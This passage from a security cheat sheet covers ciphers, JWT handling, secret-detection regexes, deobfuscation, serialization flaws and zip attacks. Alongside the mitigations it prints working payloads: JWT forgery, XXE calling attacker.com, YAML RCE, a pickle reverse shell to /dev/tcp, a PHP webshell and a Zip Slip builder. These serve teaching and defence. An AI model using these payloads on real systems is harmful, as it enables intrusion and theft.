ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext

Single-byte XOR brute force

def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
    """Brute force all 256 single-byte XOR keys. Score by printable ratio."""
    results = []
    for key in range(256):
        candidate = xor_single_byte(ciphertext, key)
        printable = sum(1 for b in candidate if 32 <= b < 127)
        score = printable / len(candidate)
        results.append((key, candidate, score))
    results.sort(key=lambda x: x[2], reverse=True)
    return results

# Example: find key for XOR-encoded shellcode
encoded = bytes([0x33, 0x26, 0x26, 0x33, 0x39, 0x29, 0x62, 0x33, 0x26, 0x62, 0x24, 0x33, 0x21, 0x2c])
for key, plaintext, score in xor_bruteforce(encoded)[:3]:
    print(f"Key 0x{key:02x} ({score:.0%}): {plaintext}")

Known-plaintext XOR attack

def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover XOR key using known plaintext at a known offset."""
    key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
    return key_fragment

# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...'  # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")

# Known plaintext for common file types:
# PE/DLL:   b'MZ' (4d5a)
# ELF:      b'\x7fELF' (7f454c46)
# PDF:      b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP:     b'\x1f\x8b' (1f8b)
# PNG:      b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG:     b'\xff\xd8\xff' (ffd8ff)

# Recover repeating key length using Hamming distance (Kasiski method)
def hamming_distance(b1: bytes, b2: bytes) -> int:
    return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))

def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
    """Estimate repeating XOR key length via normalized Hamming distance."""
    scores = []
    for kl in range(2, max_len + 1):
        blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
        if len(blocks[3]) < kl:
            continue
        distances = []
        for i in range(len(blocks)):
            for j in range(i+1, len(blocks)):
                distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
        avg = sum(distances) / len(distances)
        scores.append((kl, avg))
    scores.sort(key=lambda x: x[1])
    return scores[:5]

# XOR with Python one-liner
python3 -c "
data = bytes.fromhex('233626233a2962223626622327')
key = 0x42
print(bytes(b ^ key for b in data))
"

# XOR file with a key using xortool
# pip install xortool
xortool -b -l 4 encrypted.bin           # guess key length
xortool -b -l 4 -c 00 encrypted.bin     # try assuming null byte is most frequent

8. ROT13 / ROT47 / Caesar

ROT13 (letters only, A-Z / a-z shifted by 13)

import codecs

# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13")    # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13")             # "Attack at dawn"

# Manual implementation
def rot13(text: str) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Attack at dawn

# Alternative
echo "Attack at dawn" | rot13   # if rot13 command available

ROT47 (printable ASCII 33-126, shifted by 47)

def rot47(text: str) -> str:
    """ROT47: rotate printable ASCII characters (! through ~)."""
    result = []
    for c in text:
        o = ord(c)
        if 33 <= o <= 126:
            result.append(chr(33 + (o - 33 + 47) % 94))
        else:
            result.append(c)
    return ''.join(result)

encoded = rot47("Attack at dawn!")     # "p==246 2= 52H?P"
decoded = rot47(encoded)               # "Attack at dawn!"

echo "Attack at dawn!" | tr '!-~' 'P-~!-O'

General Caesar cipher (arbitrary shift)

def caesar(text: str, shift: int) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
    return [(shift, caesar(ciphertext, shift)) for shift in range(26)]

# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
    if 'CTF' in candidate or 'flag' in candidate.lower():
        print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}

9. JWT (JSON Web Tokens)

Decode JWT (no verification)

import base64
import json

def jwt_decode(token: str) -> dict:
    """Decode JWT without verification — forensic/analysis use."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")

    def decode_part(part: str) -> dict:
        # Add padding
        padded = part + '=' * (-len(part) % 4)
        decoded = base64.urlsafe_b64decode(padded)
        return json.loads(decoded)

    header = decode_part(parts[0])
    payload = decode_part(parts[1])
    signature = parts[2]

    return {
        'header': header,
        'payload': payload,
        'signature': signature,
        'raw_parts': parts
    }

# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}

# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}

# Full decode
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
echo "$TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

Forge JWT with alg:none attack (CVE-2015-9235)

import base64
import json

def jwt_forge_none(payload: dict) -> str:
    """Forge JWT with alg:none — exploits servers that don't verify algorithm."""
    header = {"alg": "none", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    return f"{encode_part(header)}.{encode_part(payload)}."

# Forge admin token
forged = jwt_forge_none({
    "sub": "1",
    "name": "admin",
    "role": "admin",
    "iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.

# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"

Forge JWT with HMAC/RSA confusion (CVE-2016-10555)

import hmac
import hashlib
import base64
import json

def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
    """
    If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
    The server will verify using the public key as HMAC key — signature matches.
    """
    header = {"alg": "HS256", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    header_b64 = encode_part(header)
    payload_b64 = encode_part(payload)
    signing_input = f"{header_b64}.{payload_b64}".encode()

    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()

    return f"{header_b64}.{payload_b64}.{sig_b64}"

# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
#     forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())

Crack JWT secret (HS256)

# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt

# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt

import hmac
import hashlib
import base64

def jwt_crack(token: str, wordlist_path: str) -> str | None:
    """Brute-force HS256 JWT secret from a wordlist."""
    parts = token.split('.')
    signing_input = f"{parts[0]}.{parts[1]}".encode()
    target_sig = base64.urlsafe_b64decode(parts[2] + '==')

    with open(wordlist_path, 'r', errors='ignore') as f:
        for line in f:
            secret = line.strip()
            computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(computed, target_sig):
                return secret
    return None

JWT security checklist

Attack	Condition	Mitigation
alg:none	Server accepts unsigned tokens	Reject `none` algorithm; whitelist allowed algorithms
HMAC/RSA confusion	Server accepts HS256 when configured for RS256	Enforce algorithm in server config, not from token header
Weak secret	Short/guessable HMAC key	Use 256+ bit random secret
No expiry	Missing `exp` claim	Always set and validate `exp`
kid injection	`kid` header used in SQL/file lookup	Sanitize `kid`, use allowlist
jwk/jku injection	Server fetches attacker-controlled key	Whitelist key sources
Claim tampering	Only signature checked, not claims	Validate all security-relevant claims server-side

10. Regular Expressions for Security

IPv4 / IPv6

import re

# IPv4 — strict
IPV4 = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)

# IPv4 with CIDR
IPV4_CIDR = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/\d{1,2})?\b'
)

# IPv6 — simplified (matches most common forms)
IPV6 = re.compile(r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'
                   r'|(?:[0-9a-fA-F]{1,4}:)*:(?::[0-9a-fA-F]{1,4})*')

# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
    r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
    r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
    r'192\.168\.\d{1,3}\.\d{1,3})\b'
)

URLs

URL = re.compile(
    r'https?://(?:[\w-]+\.)+[\w]{2,}'      # scheme + domain
    r'(?::\d{1,5})?'                         # optional port
    r'(?:/[^\s\'"<>]*)?'                     # optional path
)

# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')

Email

EMAIL = re.compile(
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
)

Hashes (for IOC extraction)

MD5_RE    = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE   = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')

CVE IDs

CVE = re.compile(r'CVE-\d{4}-\d{4,}')

Credit card numbers (PCI DSS scanning)

# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# Mastercard
MC = re.compile(r'\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')

# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')

def luhn_check(number: str) -> bool:
    """Validate credit card number with Luhn algorithm."""
    digits = [int(d) for d in number if d.isdigit()]
    digits.reverse()
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
    r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)

API keys and secrets

# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')

# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')

# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')

# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')

# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')

# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')

# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
    freq = {}
    for c in s:
        freq[c] = freq.get(c, 0) + 1
    return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())

# Strings > 20 chars with entropy > 4.5 are suspicious
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)

# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')

# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')

Combined IOC extractor

def extract_iocs(text: str) -> dict[str, list[str]]:
    """Extract all security-relevant indicators from text."""
    return {
        'ipv4': list(set(IPV4.findall(text))),
        'email': list(set(EMAIL.findall(text))),
        'url': list(set(URL.findall(text))),
        'md5': list(set(MD5_RE.findall(text))),
        'sha1': list(set(SHA1_RE.findall(text))),
        'sha256': list(set(SHA256_RE.findall(text))),
        'cve': list(set(CVE.findall(text))),
        'aws_key': list(set(AWS_KEY.findall(text))),
        'github_pat': list(set(GITHUB_PAT.findall(text))),
        'jwt': list(set(JWT_RE.findall(text))),
        'private_key': list(set(PRIVATE_KEY.findall(text))),
    }

11. Obfuscation & Deobfuscation

JavaScript obfuscation patterns

# --- JSFuck (encode JS using only []()!+ ) ---
# '(' becomes: (![]+[])[+!+[]+!+[]+!+[]]
# Full charset available from 6 characters

# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29")  ->  eval("alert(1)")

# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1)  ->  alert(1)

# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41))  ->  eval("alert(1)")

# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
    """Deobfuscate String.fromCharCode() calls."""
    import re
    pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
    def replace(m):
        chars = [int(c.strip()) for c in m.group(1).split(',')]
        return repr(''.join(chr(c) for c in chars))
    return re.sub(pattern, replace, js)

# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
    import re
    # \xNN
    result = re.sub(r'\\x([0-9a-fA-F]{2})',
                    lambda m: chr(int(m.group(1), 16)), js)
    # \uNNNN
    result = re.sub(r'\\u([0-9a-fA-F]{4})',
                    lambda m: chr(int(m.group(1), 16)), result)
    return result

# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
    import re, base64
    pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
    def replace(m):
        return repr(base64.b64decode(m.group(1)).decode())
    return re.sub(pattern, replace, js)

PowerShell obfuscation patterns

# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
    return base64.b64decode(encoded).decode('utf-16-le')

# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'

# --- Backtick escaping ---
# I`nv`oke-`Exp`ression -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
    import re
    # Remove backticks that escape normal characters (not special ones)
    return re.sub(r'`([^0abfnrtv])', r'\1', ps)

# --- -replace with char codes ---
# [char]73 + [char]69 + [char]88 -> 'IEX'
def deobfuscate_char_cast(ps: str) -> str:
    import re
    def replace(m):
        return chr(int(m.group(1)))
    return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)

# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'IEX'  (extracting chars from 'C:\WINDOWS\system32\cmd.exe')

# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
#   [IO.MemoryStream][Convert]::FromBase64String('...'),
#   [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

def decode_ps_deflate(b64_data: str) -> str:
    import base64, zlib
    compressed = base64.b64decode(b64_data)
    # PowerShell uses raw deflate (no zlib header), wbits=-15
    return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')

# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
    script = deobfuscate_backticks(script)
    script = deobfuscate_char_cast(script)
    # Remove common no-op patterns
    script = script.replace("( ", "(").replace(" )", ")")
    return script

Python obfuscation patterns

# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))

# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()

# --- Marshal/bytecode ---
import marshal, types
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))

# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
    """Replace exec/eval with print to see what would execute."""
    import re
    code = re.sub(r'\bexec\s*\(', 'print(', code)
    code = re.sub(r'\beval\s*\(', 'print(', code)
    return code
# WARNING: Only run deobfuscated code in a sandbox/VM

PHP obfuscation patterns

// Common patterns in webshells:

// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '')   // /e modifier = eval (PHP < 7)
// assert(base64_decode('...'))                       // acts like eval
// create_function('', base64_decode('...'))          // anonymous eval

// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']);                         // webshell one-liner

// chr() obfuscation:
// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');

# Deobfuscate PHP eval(base64_decode(...))
import re
import base64

def deobfuscate_php_b64(php_code: str) -> str:
    pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
    def replace(m):
        decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
        return f'/* DECODED: */ {decoded}'
    return re.sub(pattern, replace, php_code)

# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
    pattern = r'chr\((\d+)\)'
    parts = re.split(r'(chr\(\d+\))', php_code)
    result = []
    for part in parts:
        m = re.match(r'chr\((\d+)\)', part)
        if m:
            result.append(chr(int(m.group(1))))
        else:
            result.append(part.replace('.', ''))
    return ''.join(result)

12. Serialization Security

JSON

import json

# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)

# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution

# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */}  -> invalid JSON but some libs accept it

# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not

# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}')  # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
# Exploitation: WAF parses first key, backend parses last key

XML (XXE, XSS, billion laughs)

# --- DANGEROUS: Default XML parsing allows XXE ---
# NEVER use xml.etree.ElementTree with untrusted input without disabling entities

# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""

xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>&send;</root>"""

# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
# 3 bytes "lol" expands to ~3 GB

# SAFE XML parsing in Python
import defusedxml.ElementTree as ET  # pip install defusedxml
# or with stdlib:
from xml.etree.ElementTree import XMLParser
# Disable entities manually — defusedxml is strongly preferred

YAML (arbitrary code execution)

import yaml

# DANGEROUS: yaml.load() with default Loader executes arbitrary Python
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader)  # EXECUTES 'id'

# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")

# Exploit payloads:
yaml_rce_payloads = [
    "!!python/object/apply:os.system ['whoami']",
    "!!python/object/apply:subprocess.check_output [['id']]",
    "!!python/object/new:os.system ['curl http://attacker.com']",
    "!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]

# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# ---   i: y
# --- !!ruby/object:Gem::Requirement
# ---   requirements:
# ---     !!ruby/object:Gem::Package::TarReader
# ---     io: &1 !!ruby/object:Net::BufferedIO
# ---       io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# ---          read: 0
# ---          header: "abc"
# ---       debug_output: &1 !!ruby/object:Net::WriteAdapter
# ---          socket: &1 !!ruby/object:Gem::RequestSet
# ---              sets: !!ruby/object:Net::WriteAdapter
# ---                  socket: !ruby/module 'Kernel'
# ---                  method_id: :system
# ---              git_set: id
# ---          method_id: :resolve

Python pickle (arbitrary code execution)

import pickle
import os

# NEVER unpickle untrusted data — equivalent to eval()

# RCE via pickle:
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'

# More sophisticated: reverse shell via pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (
            ['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
        ))

# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK

def is_pickle_dangerous(data: bytes) -> bool:
    """Heuristic check for dangerous pickle opcodes."""
    dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
                         b'posix', b'commands', b'sys', b'importlib']
    for mod in dangerous_modules:
        if mod in data:
            return True
    return False

# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, use hmac to sign before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
    data = pickle.dumps(obj)
    sig = hmac.new(key, data, hashlib.sha256).digest()
    return data, sig

def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("Pickle signature verification failed")
    return pickle.loads(data)

PHP serialize/unserialize

# PHP serialization format:
# s:5:"hello";                -> string(5) "hello"
# i:42;                       -> int 42
# b:1;                        -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;}  -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";}  -> User object

# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods

# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
    return f's:{len(s)}:"{s}";'

def php_serialize_object(class_name: str, properties: dict) -> str:
    props = ''
    for key, value in properties.items():
        props += php_serialize_string(key)
        if isinstance(value, str):
            props += php_serialize_string(value)
        elif isinstance(value, int):
            props += f'i:{value};'
    return f'O:{len(class_name)}:"{class_name}":{len(properties)}:{{{props}}}'

# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}

# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison

13. Compression Security

gzip analysis

import gzip
import struct

# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)

# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
    if data[:2] != b'\x1f\x8b':
        raise ValueError("Not a gzip file")
    method = data[2]        # 8 = deflate
    flags = data[3]
    mtime = struct.unpack('<I', data[4:8])[0]
    return {
        'magic': data[:2].hex(),
        'method': 'deflate' if method == 8 else f'unknown({method})',
        'flags': f'{flags:08b}',
        'ftext': bool(flags & 1),
        'fhcrc': bool(flags & 2),
        'fextra': bool(flags & 4),
        'fname': bool(flags & 8),
        'fcomment': bool(flags & 16),
        'mtime': mtime,
    }

# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz           # list compression ratio
gzip -d -c suspicious.gz        # decompress to stdout
zcat suspicious.gz              # same as above

# Detect gzip by magic bytes
xxd suspicious.bin | head -1    # look for 1f8b

ZIP analysis and attacks

import zipfile
import os

# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
    for info in zf.infolist():
        print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
              f"{'encrypted' if info.flag_bits & 0x1 else ''}")

# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory

def safe_extract(zip_path: str, dest: str) -> None:
    """Extract ZIP safely, preventing path traversal."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for member in zf.infolist():
            member_path = os.path.realpath(os.path.join(dest, member.filename))
            if not member_path.startswith(dest + os.sep) and member_path != dest:
                raise ValueError(f"Path traversal detected: {member.filename}")
            zf.extract(member, dest)

# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
    dangerous = []
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for name in zf.namelist():
            if name.startswith('/') or '..' in name:
                dangerous.append(name)
    return dangerous

# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
    """Create a ZIP with path traversal payload. Authorized testing only."""
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr(target_path, content)

# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')

ZIP bomb (decompression bomb)

# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# Single-layer bomb:

def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
                     size_threshold: int = 1_000_000_000) -> bool:
    """Detect potential ZIP bomb by compression ratio."""
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for info in zf.infolist():
            if info.compress_size > 0:
                ratio = info.file_size / info.compress_size
                if ratio > ratio_threshold or info.file_size > size_threshold:
                    return True
            elif info.file_size > 0:
                return True  # zero compressed size but non-zero file size
    return False

# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
